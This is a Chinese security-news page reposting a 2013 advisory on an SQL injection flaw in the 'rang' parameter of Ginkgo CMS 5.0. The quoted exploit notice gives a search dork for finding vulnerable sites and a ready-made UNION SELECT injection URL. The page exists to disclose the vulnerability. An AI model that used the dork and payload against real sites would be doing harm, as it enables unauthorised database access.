Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Ginkgo CMS “rang” SQL注入漏洞

发布日期:2013-08-12
更新日期:2013-08-13受影响系统:
Ginkgo CMS Ginkgo CMS 5.0
描述:
--------------------------------------------------------------------------------
Ginkgo CMS是一款内容管理系统。Ginkgo CMS 5.0没有正确过滤 index.php 的 "rang" 参数值,即用在SQL查询中,通过注入任意SQL代码,可被利用操作SQL查询。<*来源:Raw-x
 
  链接:http://secunia.com/advisories/54485/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!__             ___ ________ __                     __         ____    __  __   
/            /\_ /\_____  /                    /        /  _` / /    
      __  __// \/____//"/" \___      __      ___ /"    L  
  __/ /     //"/"    _ `  /"__` /"___ , <      ,  /  
  L \_ \_ \_ //"/"___ / L.\_/ \__/ \` __ \ \ \_
  \____/ \____/ /\____/\_______\ \_ \_ \__/.\_ \____\ \_ \_/\_\ \_ \_ \_____
    /___/  /___/  /____//_______/ /_//_//__//_//____/ /_//_//_/ /_// //_____/############################################################################################
# Exploit Title : Ginkgo CMS SQL injection                                             #
# Date            : 31 July 2013                                                         #     
# Exploit Author  : Raw-x                                                                  #
# Site            : http://www.ginkgo-cms.com/                                           # 
# Tested on     : Linux                                                                  #   
############################################################################################Dork:~~~ inurl:"index.php?rang=" intext:"Ginkgo CMS" ~~~Examples:http://server/index.php?rang=5"/**/div/**/0/**/UNION/**/SELECT/**/1,2,3,4,5-- -
############################################################################################
#                     Thanks to: lulzhack.ru | zentrixplus.net                       #
############################################################################################建议:
--------------------------------------------------------------------------------
厂商补丁:Ginkgo CMS
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.ginkgo-cms.com/Soda PDF不安全库加载任意代码执行漏洞Microsoft Internet Explorer 内存破坏漏洞(CVE-2013-3188)(MS13-059)相关资讯      Ginkgo CMS安全漏洞  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅